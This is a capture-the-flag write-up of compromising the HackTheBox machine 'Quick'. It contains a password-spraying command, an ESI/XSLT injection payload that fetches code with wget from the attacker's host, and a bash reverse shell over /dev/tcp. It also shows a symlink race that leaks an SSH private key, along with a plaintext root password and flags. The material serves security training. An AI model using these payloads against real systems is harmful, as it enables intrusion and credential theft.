Quick

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.186 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.93 scan initiated Tue Apr  4 11:08:07 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.186
Nmap scan report for 10.10.10.186
Host is up (0.036s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
9001/tcp open  tor-orport

# Nmap done at Tue Apr  4 11:08:22 2023 -- 1 IP address (1 host up) scanned in 14.71 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,9001 10.10.10.186 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

# Nmap 7.93 scan initiated Tue Apr  4 11:08:43 2023 as: nmap -sCV -p22,9001 -Pn -n -oN targeted 10.10.10.186
Nmap scan report for 10.10.10.186
Host is up (0.036s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fbb0618239504b21a862984c9c388270 (RSA)
|   256 eebb4b72631710ee08ffe58671fe8f80 (ECDSA)
|_  256 80a6c27341f0354e5f61a76a50eab82e (ED25519)
9001/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Quick | Broadband Services
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr  4 11:08:58 2023 -- 1 IP address (1 host up) scanned in 14.64 seconds

There seems to be a website on running on port 9001. Let's take a look at it.

Exploitation

The update message has a link to https://portal.quick.htb/, but port 443 is closed in the machine. But maybe we could access it in another way. Let's try HTTP3. First, we'll need to install quiche.

git clone --recursive https://github.com/cloudflare/quiche
cd quiche
cargo build --package quiche --release --features ffi,pkg-config-meta,qlog
mkdir quiche/deps/boringssl/src/lib
ln -vnf $(find target/release -name libcrypto.a -o -name libssl.a) quiche/deps/boringssl/src/lib/

Then, build curl.

cd ..
git clone https://github.com/curl/curl
cd curl
autoreconf -fi
./configure LDFLAGS="-Wl,-rpath,$PWD/../quiche/target/release" --with-openssl=$PWD/../quiche/quiche/deps/boringssl/src --with-quiche=$PWD/../quiche/target/release
make
make install

Now, we should have a version of curl that supports HTTP3. Before trying to access https://portal.quick.htb/, we need to add the domain name to the /etc/hosts file.

nano /etc/hosts

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
f02::2     ip6-allrouters
10.10.10.186    quick.htb    portal.quick.htb

Finally, check the HTTPS website with the curl we just built.

src/curl --http3 "https://portal.quick.htb/" -s -k

<html>
<title> Quick | Customer Portal</title>
<h1>Quick | Portal</h1>
<head>
<style>
ul {
  list-style-type: none;
  margin: 0;
  padding: 0;
  width: 200px;
  background-color: #f1f1f1;
}

li a {
  display: block;
  color: #000;
  padding: 8px 16px;
  text-decoration: none;
}

/* Change the link color on hover */
li a:hover {
  background-color: #555;
  color: white;
}
</style>
</head>
<body>
<p> Welcome to Quick User Portal</p>
<ul>
  <li><a href="index.php">Home</a></li>
  <li><a href="index.php?view=contact">Contact</a></li>
  <li><a href="index.php?view=about">About</a></li>
  <li><a href="index.php?view=docs">References</a></li>
</ul>
</html>

The References page, accessible from index.php?view=docs, shows a few interesting files.

src/curl --http3 "https://portal.quick.htb/index.php?view=docs" -s -k

<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">

<h1>Quick | References</h1>
<ul>
  <li><a href="docs/QuickStart.pdf">Quick-Start Guide</a></li>
  <li><a href="docs/Connectivity.pdf">Connectivity Guide</a></li>
</ul>
</head>
</html>

Let's download and open the Connectivity.pdf file. We'll see in the How to Connect? section a password.

src/curl --http3 "https://portal.quick.htb/docs/Connectivity.pdf" -k -o Connectivity.pdf
open Connectivity.pdf

Now we need to find out where to authenticate, and with what user. Back to the main website, there was the button Get Started, which goes to the login.php login page.

On the other hand at the bottom of the main page, we saw a list of testimonials from some people.

And the clients link goes to a list of companies with their respective countries. As the login page asks for an email, we could create a wordlist such as the following by combining the name of the person who wrote the testimonial, together with the company domain name, using its country ccTLD.

nano users

tim@qconsulting.uk
tim@qconsulting.co.uk
roy@darkwing.us
elisa@wink.uk
elisa@wink.co.uk
james@lazycoop.cn

As we now have a list of emails, let's password-spray the password that we found across all these emails, and see if it is valid for any of them.

wfuzz -c -w users -d "email=FUZZ&password=Quick4cc3$$" http://10.10.10.186:9001/login.php

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.186:9001/login.php
Total requests: 9

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                
=====================================================================

000000006:   200        0 L      2 W        80 Ch       "roy@darkwing.us"                                                                      
000000003:   200        0 L      2 W        80 Ch       "john@quick.htb"                                                                       
000000002:   200        0 L      2 W        80 Ch       "mike@quick.htb"                                                                       
000000008:   302        0 L      0 W        0 Ch        "elisa@wink.co.uk"                                                                     
000000007:   200        0 L      2 W        80 Ch       "elisa@wink.uk"                                                                        
000000004:   200        0 L      2 W        80 Ch       "tim@qconsulting.uk"                                                                   
000000005:   200        0 L      2 W        80 Ch       "tim@qconsulting.co.uk"                                                                
000000001:   200        0 L      2 W        80 Ch       "jane@quick.htb"                                                                       
000000009:   200        0 L      2 W        80 Ch       "james@lazycoop.cn"                                                                    

Total time: 0.102413
Processed Requests: 9
Filtered Requests: 0
Requests/sec.: 87.87931

The elisa@wink.co.uk email shows a different status code. Let's try to log in with that email and password.

We got in. It seems that the search bar of this ticketing system page is not working. But from Raise Ticket we could a ticket.

If we submit the ticket, a popup message will appear with a ticket identifier.

We need to find a way to search for tickets. Let's enumerate the website using gobuster.

gobuster dir -u http://10.10.10.186:9001 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 -x php

dir enumerates directories or files.
-u the target URL.
-w path to the wordlist.
-t number of current threads, in this case 200 threads.

===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.186:9001
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2023/04/04 18:01:48 Starting gobuster in directory enumeration mode
===============================================================
/search.php           (Status: 200) [Size: 1]
/.php                 (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 3353]
/home.php             (Status: 200) [Size: 86]
/login.php            (Status: 200) [Size: 4345]
/clients.php          (Status: 200) [Size: 2698]
/db.php               (Status: 200) [Size: 0]
/ticket.php           (Status: 200) [Size: 86]
/.php                 (Status: 403) [Size: 279]
Progress: 175328 / 175330 (100.00%)
===============================================================
2023/04/04 18:04:50 Finished
===============================================================

There is one file called search.php, and it asks for a search item.

If we add the search GET parameter with the ticket identifier as its value, we'll see the ticket we created before.

http://10.10.10.186:9001/search.php?search=TKT-5072

Let's see if there is a way to inject code in this ticketing system. If we take a look at the HTTP response headers, we'll see one called X-Powered-By that has the value Esigate.

curl http://10.10.10.186:9001 -I

HTTP/1.1 200 OK
Server: Apache/2.4.29 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Via: 1.1 localhost (Apache-HttpClient/4.5.2 (cache))
X-Powered-By: Esigate
Content-Length: 2

If we search on the internet for Esigate common exploits, we'll see an article called ESI Injection Part 2: Abusing specific implementations, which explains how to get Remote Command Execution on the server. First, we need to create a file called rce with a reverse shell command to our local system.

nano rce

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1

Now, we need to create a few files called rce.xml and rce.xsl with the following code, that will download the rce file.

nano rce.xml
cp rce.xml rce.xsl

<?xml version="1.0" ?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<root>
<xsl:variable name="cmd"><![CDATA[wget http://10.10.14.5/rce]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
Process: <xsl:value-of select="$process"/>
Command: <xsl:value-of select="$cmd"/>
</root>
</xsl:template>
</xsl:stylesheet>

Then, set a simple HTTP server with PHP on port 80 where all these files are located.

php -S 0.0.0.0:80

And a netcat listener on port 4444.

nc -lvnp 4444

-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.

Next, create a new ticket with the following message.

<esi:include src="http://10.10.14.5/rce.xml" stylesheet="http://10.10.14.5/rce.xml"> </esi:include>

Copy the ticket identifier.

Now, if we search for the ticket, it will download the rce file from our HTTP server.

http://10.10.10.186:9001/search.php?search=TKT-2324

[Tue Apr  4 18:25:23 2023] 10.10.10.186:49454 [200]: GET /rce

Now we need to trigger the rce bash script and catch the reverse shell. We just need to change the command on both the rce.xml and rce.xsl file.

nano rce.xml
cp rce.xml rce.xsl

...
<xsl:variable name="cmd"><![CDATA[bash rce]]></xsl:variable>
...

Finally, if we reload the search.php page, the server will run the rce script, and we'll catch a reverse shell as sam. Then, we'll be able to grab the user flag.

http://10.10.10.186:9001/search.php?search=TKT-2324

Listening on 0.0.0.0 4444
Connection received on 10.10.10.186 44264
bash: cannot set terminal process group (1110): Inappropriate ioctl for device
bash: no job control in this shell
sam@quick:~$ whoami
whoami
sam
sam@quick:~$ cat user.txt
cat user.txt
34e254646f1732834991f7261317899c

Privilege Escalation

First, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg
reset
Terminal type? xterm

Next, I export a few variables:

export TERM=xterm
export SHELL=bash

Finally, I run the following command on our local machine:

stty size

51 236

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

As seen below, there are other directories apart from the html directory in /var/www/.

ls -la /var/www

total 20
drwxr-xr-x  5 root root 4096 Dec 14  2021 .
drwxr-xr-x 14 root root 4096 Dec 14  2021 ..
drwxr-xr-x  2 root root 4096 Dec 14  2021 html
drwxrwxrwx  2 root root 4096 Apr  4 14:53 jobs
drwxr-xr-x  6 root root 4096 Dec 14  2021 printer

In fact if we check the apache /etc/apache2/sites-enabled/000-default.conf file, we'll see that there is virtual hosting being made with the domain printerv2.quick.htb.

cat /etc/apache2/sites-enabled/000-default.conf

<VirtualHost *:80>
        # The ServerName directive sets the request scheme, hostname and port that
        # the server uses to identify itself. This is used when creating
        # redirection URLs. In the context of virtual hosts, the ServerName
        # specifies what hostname must appear in the request's Host: header to
        # match this virtual host. For the default virtual host (this file) this
        # value is not decisive as it is used as a last resort host regardless.
        # However, you must set it for any further virtual host explicitly.
        #ServerName www.example.com

        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html

        # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
        # error, crit, alert, emerg.
        # It is also possible to configure the loglevel for particular
        # modules, e.g.
        #LogLevel info ssl:warn

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined

        # For most configuration files from conf-available/, which are
        # enabled or disabled at a global level, it is possible to
        # include a line for only one particular virtual host. For example the
        # following line enables the CGI configuration for this host only
        # after it has been globally disabled with "a2disconf".
        #Include conf-available/serve-cgi-bin.conf
</VirtualHost>
<VirtualHost *:80>
        AssignUserId srvadm srvadm
        ServerName printerv2.quick.htb
        DocumentRoot /var/www/printer
</VirtualHost>

Let's add the domain name to our /etc/hosts file.

nano /etc/hosts

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
f02::2     ip6-allrouters
10.10.10.186    quick.htb    portal.quick.htb    printerv2.quick.htb

There is another login page if we try to access the website.

As we have access to all the source code of the website, let's inspect it. The /var/www/printer/db.php file contains credentials for the MySQL database.

cat /var/www/printer/db.php

<?php
$conn = new mysqli("localhost","db_adm","db_p4ss","quick");
?>

Let's connect to the database using those credentials and enumerate the database.

mysql -u db_adm -pdb_p4ss

There is one database called quick.

mysql> show databases;

+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| quick              |
| sys                |
+--------------------+
5 rows in set (0.00 sec)

The quick database has three tables.

mysql> use quick;
mysql> show tables;

+-----------------+
| Tables_in_quick |
+-----------------+
| jobs            |
| tickets         |
| users           |
+-----------------+
3 rows in set (0.01 sec)

The most interesting one is the users table, which has only two entries containing a password hash of the users Elisa and Server Admin.

mysql> select * from users;

+--------------+------------------+----------------------------------+
| name         | email            | password                         |
+--------------+------------------+----------------------------------+
| Elisa        | elisa@wink.co.uk | c6c35ae1f3cb19438e0199cfa72a9d9d |
| Server Admin | srvadm@quick.htb | e626d51f8fbfd1124fdea88396c35d05 |
+--------------+------------------+----------------------------------+
2 rows in set (0.00 sec)

In fact, we can see how to passwords are being hashes in the index.php file. It is using the MD5 hash type and the fa salt.

cat /var/www/printer/index.php

...
$password = md5(crypt($password,'fa'));
...

As we won't be able to break the hash, we can simply change the hash of the srvadm@quick.htb user to be the same as the Elisa.

mysql> update users set password="c6c35ae1f3cb19438e0199cfa72a9d9d" where email="srvadm@quick.htb";

This way, we can log in as srvadm@quick.htb using the Quick4cc3$$ password.

Once logged in, we'll see a print server website.

We can add a printer. As it is asking for an IP address, we can put our IP address, so we'll see what is going on with a netcat listener.

Set a netcat listener on port 5555.

nc -lvnp 5555

-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.

Our new printer should be available from Printers.

By pressing the printer icon, we'll see a message saying that we should add a job.

From the PRINT JOBS section, we can create a new job, which will be received by the netcat listener when the Print button is pressed.

Listening on 0.0.0.0 5555
Connection received on 10.10.10.186 39462
testingVA

Let's inspect the source code and see if there is a way to escalate privileges. The /var/www/printer/job.php file has the following PHP code.

cat /var/www/printer/job.php

if($_SESSION["loggedin"])
{
        if(isset($_POST["submit"]))
        {
                $title=$_POST["title"];
                $file = date("Y-m-d_H:i:s");
                file_put_contents("/var/www/jobs/".$file,$_POST["desc"]);
                chmod("/var/www/printer/jobs/".$file,"0777");
                $stmt=$conn->prepare("select ip,port from jobs");
                $stmt->execute();
                $result=$stmt->get_result();
                if($result->num_rows > 0)
                {
                        $row=$result->fetch_assoc();
                        $ip=$row["ip"];
                        $port=$row["port"];
                        try
                        {
                                $connector = new NetworkPrintConnector($ip,$port);
                                sleep(0.5); //Buffer for socket check
                                $printer = new Printer($connector);
                                $printer -> text(file_get_contents("/var/www/jobs/".$file));
                                $printer -> cut();
                                $printer -> close();
                                $message="Job assigned";
                                unlink("/var/www/jobs/".$file);
                        }
                        catch(Exception $error) 
                        {
                                $error="Can't connect to printer.";
                                unlink("/var/www/jobs/".$file);
                        }
                }
                else
                {
                        $error="Couldn't find printer.";
                }
        }

For each new job, the web server is creating a new file with a date in the format Y-m-d_H:i:s as the name in the directory /var/www/jobs/. Then, it is putting the Bill Details of the job inside the file. Finally, it is connecting to the configured printer, and sends the content of the file.

Before doing the connection, it is waiting for 0.5 seconds. This is a problem because in that period of time we could create a symbolic link between the file created in /var/www/jobs/ and the private SSH key of the srvadm user. So when the server connects to our machine, we'll receive the id_rsa private key.

Go to the /var/www/printer and run the following command.

cd /var/www/printer
while true; do date=$(date +%F_%H:%M:%S); if [ -r $date ]; then ln -s -f /home/srvadm/.ssh/id_rsa $date; fi ; done

Now, go ahead and create a new job. When we hit Print, we should see the private SSH key of the srvadm user in our netcat listener.

Connection received on 10.10.10.186 39472
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAutSlpZLFoQfbaRT7O8rP8LsjE84QJPeWQJji6MF0S/RGCd4P
AP1UWD26CAaDy4J7B2f5M/o5XEYIZeR+KKSh+mD//FOy+O3sqIX37anFqqvhJQ6D
...
+DvKZu+NeroPtaI7NZv6muiaK7ZZgGcp4zEHRwxM+xQvxJpd3YzaKWZbCIPDDT/u
NJx1AkN7Gr9v4WjccrSk1hitPE1w6cmBNStwaQWD+KUUEeWYUAx20RA=
-----END RSA PRIVATE KEY-----
VA

Copy and paste the key into the id_rsa file, give it the right permissions, and get a shell as srvadm.

nano id_rsa; chmod 600 id_rsa
ssh -i id_rsa srvadm@10.10.10.186

Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Apr  4 19:10:20 UTC 2023

  System load:  1.13              Users logged in:                0
  Usage of /:   73.1% of 7.75GB   IP address for ens33:           10.10.10.186
  Memory usage: 16%               IP address for docker0:         172.17.0.1
  Swap usage:   0%                IP address for br-9ef1bb2e82cd: 172.18.0.1
  Processes:    186


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

52 packages can be updated.
27 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Apr  4 18:42:58 2023 from 10.10.14.5
srvadm@quick:~$ whoami
srvadm

If we check his home directory, we'll see the .cache folder.

ls -la

total 40                                                                                                                                  
drwxr-xr-x 6 srvadm srvadm 4096 Apr  4 18:44 .                                                                                            
drwxr-xr-x 4 root   root   4096 Mar 20  2020 ..                                                                                           
lrwxrwxrwx 1 srvadm srvadm    9 Mar 20  2020 .bash_history -> /dev/null                                                                   
-rw-r--r-- 1 srvadm srvadm  220 Mar 20  2020 .bash_logout                                                                                 
-rw-r--r-- 1 srvadm srvadm 3771 Mar 20  2020 .bashrc                                                                                      
drwx------ 5 srvadm srvadm 4096 Mar 20  2020 .cache                                                                                       
drwx------ 3 srvadm srvadm 4096 Mar 20  2020 .gnupg                                                                                       
drwxrwxr-x 3 srvadm srvadm 4096 Mar 20  2020 .local                                                                                       
-rw------- 1 srvadm srvadm   62 Apr  4 18:44 .mysql_history                                                                               
-rw-r--r-- 1 srvadm srvadm  807 Mar 20  2020 .profile                                                                                     
drwx------ 2 srvadm srvadm 4096 Mar 20  2020 .ssh

Which has a few more directories in it.

ls -la .cache/

total 20                                                                                                                                  
drwx------ 5 srvadm srvadm 4096 Mar 20  2020 .                                                                                            
drwxr-xr-x 6 srvadm srvadm 4096 Apr  4 18:44 ..                                                                                           
drwxr-xr-x 2 srvadm srvadm 4096 Mar 20  2020 conf.d                                                                                       
drwxr-xr-x 2 srvadm srvadm 4096 Mar 20  2020 logs                                                                                         
-rw-r--r-- 1 srvadm srvadm    0 Mar 20  2020 motd.legal-displayed                                                                         
drwxr-xr-x 2 srvadm srvadm 4096 Mar 20  2020 packages

Inside the conf.d directory there is a file called printers.conf with some credentials in it.

cat .cache/conf.d/printers.conf

DeviceURI https://srvadm%40quick.htb:%26ftQ4K3SGde8%3F@printerv3.quick.htb/printer

Let's url-decode the URI.

php --interactive

Interactive shell

php > echo urldecode("DeviceURI https://srvadm%40quick.htb:%26ftQ4K3SGde8%3F@printerv3.quick.htb/printer");
DeviceURI https://srvadm@quick.htb:&ftQ4K3SGde8?@printerv3.quick.htb/printer

We have a password that seems to be valid for the root user. So finally, all we have to do is reap the harvest and take the root flag.

su root

Password: 
root@quick:/home/srvadm# whoami
root
root@quick:/home/srvadm# cat /root/root.txt 
53b4aa89af24e5b268b63aa398042f78

Last updated 2 years ago

Was this helpful?